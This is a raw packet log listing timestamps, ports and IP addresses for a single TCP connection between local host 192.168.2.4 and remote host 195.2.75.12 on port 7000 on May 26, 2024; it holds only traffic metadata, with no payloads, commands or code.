May 26, 2024 01:21:26.229418039 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.229480982 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.229672909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.230042934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.230079889 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.230150938 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.230168104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.230225086 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.230974913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.231121063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.231326103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.231372118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.231899977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.231966019 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.232006073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.232222080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.232404947 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.232470989 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.232847929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.232908010 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.233468056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.233586073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.233815908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.233880043 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.234369993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.234435081 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.237152100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.237186909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.237266064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.262927055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.263107061 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.265996933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.266042948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.266146898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.266185999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.266232014 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.266791105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.266844034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.266989946 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.266990900 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.267118931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.267468929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.268733025 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.271032095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.271311045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.271349907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.271373987 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.271562099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.271749973 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.271761894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.271966934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.272157907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.272196054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.272221088 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.272263050 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.272501945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.272797108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.272938013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.273003101 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.273149967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.273216009 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.273444891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.273529053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.273802996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.273838043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.273865938 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.273904085 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.274369001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.274522066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.274558067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.274629116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.274699926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.274760008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.275067091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.275101900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.275183916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.275244951 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.275407076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.276020050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.276082993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.276129961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.276185036 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.276360989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.276396990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.276849985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.276962042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.276973963 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.277023077 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.277180910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.277215958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.277410984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.277472973 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.277731895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.277789116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.282177925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.300163031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.300228119 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.300558090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.300648928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.300702095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.300853014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.300873041 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.300957918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.301029921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.304928064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.305145025 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.307686090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.307760954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.307836056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.307873964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.307949066 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.308336020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.308532953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.308644056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.308820963 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.308824062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.309370041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.309452057 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.309473038 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.309664965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.310223103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.310329914 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.310343027 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.310379982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.310409069 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.311085939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.311202049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.311280012 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.311383009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.311924934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.311986923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.312019110 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.312077045 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.312237978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.312433004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.312760115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.312828064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.312877893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.312937021 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.313606977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.313720942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.313951969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.314018011 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.314517975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.314580917 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.314613104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.314795017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.315310955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.315347910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.315412045 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.315433025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.315450907 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.316138983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.316231966 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.316276073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.316452026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.316971064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.317015886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.317078114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.317286968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.317289114 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.317563057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.317636967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.317696095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.318423033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.318506956 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.318548918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.318721056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.318922043 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.319288969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.319401979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.319574118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.319578886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.320113897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.320148945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.320184946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.320190907 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.320241928 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.321011066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.321077108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.321269989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.321305037 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.321829081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.321907997 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.321918011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.322089911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.322647095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.322748899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.324323893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.324361086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.324424028 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.324465990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.324522018 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.324582100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.324841976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.325628042 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.329104900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.357383013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.357439041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.357484102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.357501984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.357889891 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.357938051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.358069897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.358213902 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.361892939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.361965895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.361999035 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.362096071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.362132072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.362139940 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.362139940 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.362225056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.362533092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.362761021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.362867117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.362926960 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.363451004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.363548040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.363656998 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.364276886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.364311934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.364340067 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.364377975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.364588976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.364650965 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.365187883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.365255117 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.365283966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.365461111 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.365801096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.365863085 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.365904093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.365961075 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.366117954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.366758108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.366791964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.366852999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.366856098 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.366919041 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.367106915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.367142916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.367386103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.367449999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.367630959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.367741108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.367803097 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.367943048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.368002892 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.368552923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.368655920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.368844032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.368905067 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.369050980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.369112015 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.369407892 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.372364044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.372397900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.372441053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.391289949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.391349077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.391418934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.391453981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.391591072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.391591072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.391803980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.392010927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.392102003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.392158031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.393229008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.395824909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.398875952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.398986101 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.399024010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.399060011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.399096966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.399147034 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.399147987 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.399233103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.399687052 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.399741888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.399941921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.400120020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.400182009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.400243044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.400506020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.400609016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.400796890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.400834084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.400859118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.400897026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.400934935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.401386976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.401489019 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.401551008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.401688099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.401748896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.402318001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.402448893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.402646065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.402683020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.402717113 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.402746916 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.403208971 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.403326035 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.403362036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.403433084 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.403486967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.403548002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.404136896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.404237986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.404478073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.404512882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.404541969 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.404570103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.405019999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.405111074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.405267954 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.405303001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.405780077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.405817032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.405879974 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.405906916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.405962944 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.406076908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.406255960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.406853914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.406919956 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.406975985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.407032967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.407593966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.407668114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.407730103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.408138037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.408253908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.408288956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.408346891 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.409002066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.409060955 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.409102917 CEST	7000	49730	195.2.75.12	192.168.2.4
